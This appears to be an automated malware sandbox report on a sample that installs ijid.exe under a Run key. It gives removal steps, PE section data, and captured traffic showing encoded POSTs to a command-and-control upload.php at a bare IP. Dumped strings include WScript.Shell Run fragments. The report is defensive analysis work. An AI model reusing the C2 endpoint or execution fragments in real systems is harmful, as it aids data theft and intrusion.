    %System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
    %System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
    %WinDir%\FaxSetup.log (53338 bytes)
    %WinDir%\tsoc.log (79170 bytes)
    %System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
    %WinDir%\KB968930xp.cat (59 bytes)
    %System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
    %System%\winrm\0409\SET1D.tmp (601 bytes)
    %System%\SETD.tmp (601 bytes)
    %WinDir%\inf\SET19.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
    %System%\SET9.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
    %System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
    %System%\winrm\0409\SET37.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
    %System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
    %System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
    %System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
    %WinDir%\ocgen.log (71000 bytes)
    %System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
    %System%\SET2F.tmp (789 bytes)
    %System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
    %System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
    %System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
    %System%\SET30.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
    %System%\wbem\SET1E.tmp (4 bytes)
    %System%\SET23.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
    %WinDir%\netfxocm.log (9089 bytes)
    %System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
    %System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
    %WinDir%\inf\SET33.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
    %System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
    %WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (83393 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\System.Management.Automation.dll (105990 bytes)
    %WinDir%\assembly\tmp\0JNQTWZ3\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
    %WinDir%\assembly\tmp\0KNQTX03\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
    %WinDir%\assembly\tmp\YHKNQTWZ\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
    %WinDir%\assembly\tmp\1MQTWZ26\Microsoft.PowerShell.Security.dll (2392 bytes)
    %WinDir%\assembly\tmp\7QTW0369\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\K58BEHKO\System.Management.Automation.dll (81046 bytes)
    %WinDir%\assembly\tmp\2MPSVY25\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
    %WinDir%\assembly\tmp\L58CFILO\Microsoft.PowerShell.Security.resources.dll (9 bytes)
    %WinDir%\assembly\tmp\VEILORUY\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
    %WinDir%\assembly\tmp\TCFJMPSV\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
    %WinDir%\assembly\tmp\N7ADHKNQ\Microsoft.WSMan.Runtime.dll (7 bytes)
    %WinDir%\assembly\tmp\CVY258BE\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
    %WinDir%\assembly\tmp\EY147ADG\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
    %WinDir%\assembly\tmp\AUX147AD\Microsoft.WSMan.Management.resources.dll (13 bytes)
    %WinDir%\assembly\tmp\GZ258CFI\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\EX0369DG\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\O9CFIMPS\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
    %WinDir%\assembly\tmp\1LORUX14\System.Management.Automation.resources.dll (9320 bytes)
    %WinDir%\assembly\tmp\EX0369CF\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
    %WinDir%\assembly\tmp\P9DGJMQT\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
    %WinDir%\assembly\tmp\EY148BEH\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
    %WinDir%\assembly\tmp\YGJMPTWZ\Microsoft.PowerShell.Editor.dll (32824 bytes)
    %WinDir%\assembly\tmp\5ORUX047\Microsoft.WSMan.Management.dll (9608 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (164 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (29849 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\ijid\ijid.exe (1625 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (164 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\"%CurrentUserName%"\local settings\application data\ijid\ijid.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "c:\documents and settings\"%CurrentUserName%"\local settings\application data\ijid\ijid.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text4096323035844.007448bbd567bc554df14a61913eef75058e9
.rdata8192192020483.339279aa6434b4ffebd689a4167cb76d8d588
.data1228813165121.58786f641c3525051d47ca09c5e5a5f9b6e03
.rsrc163843366763368965.53646771221fad7c915a3ee4669057519f749

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://178.33.69.66/upload.php
hxxp://microsoft.com/191.239.213.197
hxxp://e10088.dspb.akamaiedge.net/
hxxp://e10088.dspb.akamaiedge.net/uk-ua/
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe
hxxp://www.microsoft.com/uk-ua/2.17.169.115
hxxp://www.microsoft.com/2.17.169.115

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET / HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Cache-Control: no-cache

Host: VVV.microsoft.com

HTTP/1.1 302 Moved Temporarily

Server: AkamaiGHost

Content-Length: 0

Location: hXXp://VVV.microsoft.com/uk-ua/

Date: Wed, 02 Mar 2016 03:13:56 GMT

Connection: keep-alive

X-CCC: SE

X-CID: 2

....

GET /uk-ua/ HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Cache-Control: no-cache

Host: VVV.microsoft.com

HTTP/1.1 200 OK

Cache-Control: no-cache, no-store

Pragma: no-cache

Content-Type: text/html

Expires: -1

Server: Microsoft-IIS/8.5

CorrelationVector: Nr7dWunqj0y1zWPO.1.1

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Access-Control-Allow-Headers: Content-Type

Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS

Access-Control-Allow-Credentials: true

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

X-Frame-Options: SAMEORIGIN

Content-Length: 68256

Date: Wed, 02 Mar 2016 03:13:57 GMT

Connection: keep-alive

Set-Cookie: MS-CV=Nr7dWunqj0y1zWPO.1; domain=.microsoft.com; expires=Thu, 03-Mar-2016 03:13:56 GMT; path=/

Set-Cookie: MS-CV=Nr7dWunqj0y1zWPO.2; domain=.microsoft.com; expires=Thu, 03-Mar-2016 03:13:57 GMT; path=/

X-CCC: SE

X-CID: 2

...<!DOCTYPE html ><html xmlns:mscom="hXXp://schemas.microsoft.com/CMSvNext" xmlns:md="hXXp://schemas.microsoft.com/mscom-data" lang="uk" xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="//VVV.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="hXXp://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js"> .. // Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - hXXp://VVV.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewportStyle.appendChild(document.createTextNode("@-ms-viewport{width:auto!important}"));document.getElementsByTagName("head")[0].appendChild(msViewportStyle)}/*]]>*/</script><script type="text/javascript" src="hXXp://ajax.aspnetcdn.com/ajax/jquery.mobile/1.3.2/jquery.mobile-1.3.2.min.js"></script><script type="text/javascript" src="hXXp://i.s-microsoft.com/library/svy/broker.js"></script><script type="text/javascript" src="hXXp://c.webt

<<< skipped >>>

POST /upload.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 178.33.69.66

Content-Length: 252

Cache-Control: no-cache

JD0RjpU6U/4/PJwAb86GElYpA31QBYM2bhwPg2SzF7sWFuHbdqpblNgwfe6RBvvS22dy34i9dLMz6po1hvsvTVRzrT39NOf49mz89999cKLIG0/u0tdOQ/HoTyKWRcouTghGKsInDu6h1tMws1xk /IFrrDXRlrr Y/Ps BPKOnACseFLzBQZ5eQEMYMdAdMuXvpbTmyWmChKMM00bqn4HiHv0kuchdKMxdITHNKnBdr36HV4syr1KPu0TM=

HTTP/1.1 404 Not Found

Server: nginx

Date: Wed, 02 Mar 2016 03:13:56 GMT

Content-Type: text/html; charset=iso-8859-1

Content-Length: 208

Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.</body></html>...

GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: download.microsoft.com

Cache-Control: no-cache

Cookie: MS-CV=Nr7dWunqj0y1zWPO.2

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT

Accept-Ranges: bytes

ETag: "6d3979883b49ca1:0"

Server: Microsoft-IIS/8.5

Content-Disposition: attachment

Content-Length: 6156064

Date: Wed, 02 Mar 2016 03:13:58 GMT

Connection: keep-alive

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#pA.B...B...B..gM...B...B...B..gMC..B..gMA..B..gM@..B..gMD..B..Rich.B..........................PE..L....jkG.............................c... ........... ................................^.......... ......................................x.............]. ........... "...............................&..@............ ...............................text........ ...................... ..`.data...............................@....rsrc...x........H].................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................l...V...:..."...............................|...................................(...r...d...T.......*...........P...j...................<...................\.......................................>...L...^...n...........................................2...L.......h...p.......................................(...>...L...`...v...................................N...>...,...................d...........................................................z...,...<...J...\...|.......N...Z...d...n...@....

<<< skipped >>>

POST /upload.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 178.33.69.66

Content-Length: 228

Cache-Control: no-cache

d25DjJ8 VH9clYYqnye2pxX0dsSFgFJTrV8CIs DAi4LsvH5d5xXB8mB9IyXpPTx6o6UmAC EtfUCMAei7noRwri084j5Ru2evzYkSnRnLS6EYjS0JKUGTBkMyqbuFa1KuA491ojubljuLFnV0eoqFKWKFB32/9evV2IN oZZNt9j5Gh5XbjC635RautAGDk3bY4DYaOnTASWNALfeVtgpALdcS4SR qvc8W

HTTP/1.1 404 Not Found

Server: nginx

Date: Wed, 02 Mar 2016 03:13:56 GMT

Content-Type: text/html; charset=iso-8859-1

Content-Length: 208

Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.</body></html>...

GET / HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: microsoft.com

Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently

Content-Type: text/html; charset=UTF-8

Location: hXXp://VVV.microsoft.com/

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Date: Wed, 02 Mar 2016 03:13:55 GMT

Content-Length: 148

<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>HTTP/1.1 301 Moved Permanently..Content-Type: text/html; charset=UTF-8..Location: hXXp://VVV.microsoft.com/..Server: Microsoft-IIS/8.5..X-Powered-By: ASP.NET..Date: Wed, 02 Mar 2016 03:13:55 GMT..Content-Length: 148..<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>..

Map

The Malware connects to the servers at the folowing location(s):

Strings from Dumps

regsvr32.exe_304:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

USER32.DLL

USER32.DLL

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

Kernel32.dll

Kernel32.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

PSAPI.dll

PSAPI.dll

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {jwplayer().play()} catch(e){}

try {jwplayer().play()} catch(e){}

IWebBrowser

IWebBrowser

IWebBrowserApp

IWebBrowserApp

IWebBrowser2$

IWebBrowser2$

.length;

.length;

=String.fromCharCode(parseInt(

=String.fromCharCode(parseInt(

.substr(

.substr(

,2),16));

,2),16));

=String.fromCharCode(

=String.fromCharCode(

,1).charCodeAt()^

,1).charCodeAt()^

,1).charCodeAt());

,1).charCodeAt());

.length-1)?

.length-1)?

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.Environment("Process"))("

.Environment("Process"))("

.Run("

.Run("

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.RegRead("

.RegRead("

psapi.dll

psapi.dll

HTTP/1.1

HTTP/1.1

\\.\LCD

\\.\LCD

1234567890

1234567890

Shell32.dll

Shell32.dll

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

0123456789

0123456789

Mozilla

Mozilla

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

.text

.text

`.rdata

`.rdata

@.pdata

@.pdata

KERNEL32.dll

KERNEL32.dll

@.reloc

@.reloc

222.dll

222.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

oleaut32.dll

oleaut32.dll

RegOpenKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegDeleteKeyW

RegCreateKeyW

RegCreateKeyW

RegCreateKeyA

RegCreateKeyA

version.dll

version.dll

gdi32.dll

gdi32.dll

SetProcessWindowStation

SetProcessWindowStation

OpenWindowStationA

OpenWindowStationA

EnumChildWindows

EnumChildWindows

HttpSendRequestA

HttpSendRequestA

HttpOpenRequestA

HttpOpenRequestA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindCloseUrlCache

FindCloseUrlCache

DeleteUrlCacheEntry

DeleteUrlCacheEntry

ole32.dll

ole32.dll

wsock32.dll

wsock32.dll

winmm.dll

winmm.dll

atl.dll

atl.dll

wtsapi32.dll

wtsapi32.dll

Wtsapi32.dll

Wtsapi32.dll

PSAPI.DLL

PSAPI.DLL

shell32.dll

shell32.dll

ShellExecuteExW

ShellExecuteExW

NtQueryValueKey

NtQueryValueKey

NtDeleteValueKey

NtDeleteValueKey

NtSetValueKey

NtSetValueKey

urlmon.dll

urlmon.dll

UrlMkSetSessionOption

UrlMkSetSessionOption

4"4,414?4

4"4,414?4

5)646[6`6

5)646[6`6

7 7$7(7,707

7 7$7(7,707

:$:):5:::

:$:):5:::

; ;%;,;_;

; ;%;,;_;

=?>'?0?>?

=?>'?0?>?

8 8&8 8}8

8 8&8 8}8

C8awVgMXV9vSi1BFF84c4B2LLj3ZyoV2Qb4Cp1fjeXzNbuE C/NOeyDxEiWq KAKYpcDw0MN03HLvP X68Twy06sJD1a75Ix8ZYYtMfBzG6bOl2S055vgBpGXePBPy10 EE5/nPwqFfmma5P SWmtr/unuKTXz3CYHDqU7l04vA3nXuBxiR/H3300uMmNOd8rckhl/27CFO7Z/7wb3 ckg3vq5FyOm638bm3E6xPWpHzNe ekY CNkDYMxZSenzqz d2OWvy610ctvP/4zfbwjyPnV7OyUjNNsd884gq1UeBxNtTA4Gq01CNaR2WFJNroUacP4rF7rnvztggNjxANsE26EK8zhbRSm2xw9YVXBamCQU0CoOu9kYQsbABXh16aiRnvvPrGd/Pk64B5Ijsf66Yg/ 24sKlRuKdfiRj8Cu5TbL8HFAcfx9uSaayN0nIU8Cb/F8g1mzX4pCpnBmj7AL/uqsEuLAtuxgH0DgSqz3UN mIFAT8fXXaIXDUBIy12Pa7W2cJQTgGvC0KO4Z8D5Q1XNS2/uZum9rLEICYOgm/uSfXNrWcrXL67xe3ES/R1im56DGnpzcD79NLxL08H7gXnk4IIGAU4hPLZmmLkiZdSK3ea9J8NLKwIZIGQ5GtCYIhNo8mswzlWe9HCuJvkElVO7Yn4firX/XB0roU 4 7lg5mVGHbYn Cde1V2MF1NG01/0LdhDueGifdOrz/upnRDyYtEA7qWAYQKzTkLRXXoexX4yz9cq6oKaJYxYFneIahOS43IkirG30vhiq29S TDiokA90t1//u9iUC8MeJ54PQ/QHGxU 33lAgQWcxZqV92qxprubwz6CE0aH0wSHG7pZSu5oMJB YAFZ5fCSnrM7jDUVG4j72D5jw2r1Xf 8AZ qDVdkW1jtIBOVU5UcEya3fLYAHNsvrmxxMYy1TyAaEJ7z2h6 OXmyl9bjMQZHu31V39G/DrYWAQL VxL6btazkFp9n2jWGravH9bmxx UVMMlwNoqyrpKRMMKw2/yTs7qd/GXOqKBUiGBQVfVNZ/rSJXBEnmWwT21RpMP/hrF AYwqKRJfbMup1h6Ousk0MTCddz9p1n9 peAAf8565VJFRi7kksOaVEt15YJ2LF4TmU/wcq6P6WAIC2PspbhW7Wu V5 gDjujIbqzreSGBdA/iaZwk2OtJxu2/e3rw6aCHXBywbAOazkvdgWPDXufcHybYGGWGHBkrnfWNzIAkaPCaDVouiMguIXr8KDSG1 4xlQ5x6v8mWkekwNcSstXZH4D1TGyPch2pINQtU56LFJQg3m27IuVDKfzakcOrsbqq6Qixgcq1IIdHX533uSfnOA58SEofj6eaJuetab15SRYn9HJW4Hobv2VAwdyoTxwnshUx0yNUgiQEzvAZzn xhTgaVCN/WAd3/ahucI/ioTaSIF5uJXMCyzokd8k/2YYDVRDIdNzEbUxwLg4H GLyo37d29wqznvhkfttKuwM62BVwfzzNFX RdhHu5DX4Qqz5U IZaTNSPsXQYSpZHnJtcYtl7fgkBpD9Ezl4FwN8YDZrPTSiZ94GfMNxsm2T2ahGmEi9AQi8J6Yb3JrWYjo5poeNjXvqY0b2TVygFXorynEgAah3J7tDepAP3B10vauooVjTlhHaqUFinkbgfbMdpPjleeIX9/or5vH8S/mPCCkfvu7/sdhUaAcYqaMBZgS9fmlEp8HnwyPnzp1UcK3gw1bsWDBjd4cLdODm5FXiPV8Ae8zUjBgU8KdSzVbA2GNJDnrpcChLB7nDyu2dQuF5YipF1/SOfIqtqqtoYHSN5wlqlKf27DyUkUtWs 0wofei4spsC43YMDMK FelI6vkxSrpYvFR/L4EuoZayxGGz u50U8SHnlq6f3BJ1CYaWoWPu/6ZFx2ctY9B7p5FGMyx7Wh7RudN1CPb3nRnjcdipok1y5rYJuy6fTDe94/W1n4O5gMBKI3ENQGro28P/zequsQ/2NwHygdQ jgYIM/0cjBReqXqGdonn8TSJQvTPQoG1BM5BHm4iQ0dHCGCxULBYXKCsIQ6EQ22gEweFwCIIiZ44Hb4iwmWYNrfGOg6/CmBCmW8lNPuryYHm7R72So5e0ix7AV7yCD7SKiNxPkA/01bPbd7MkZJMdZj8EZ Dha2IU0RFMEQmLi9pmk0 EiDEXNN5lLbfqScHFc/x4B8fsziFj4IxcSYnyXgsvZhXxY5WekEhLY0RrAFBMcHfQIH PqN6mudOAAIcMZoY0wgTRt1toBvUDESld18WNHj6TQEczXGrsFI/KIiuK69pf6wpDgoM0ilDTEnRWvbjJug0ZB8ASU/WsU3zh7j9USRdqvlCyUj GCpwR49iaWQUc6fMXGzIbAJHAAcCGV6Ed3ohqn/uxdZvCO25Kw Yp9dbBjoVjaB3zTz9bXdNM/JF0mzn54N0VYndNaMUroohblm4FAikvOuNXq/4HJHnlKx8JZy f4bJRxIG4poNfiSOxJst5nSlRJvBaVQk89xZwyeKsPv80JsloB5uWywvBWUd1MLqZW3/o0uPiRjnjdF6BVHvomGIBbX RFJsqnJM3FBRnRXJyx9uzlSqtxq1HgoXyjXRatjnwgQXs ID05Y5YGBBggeX 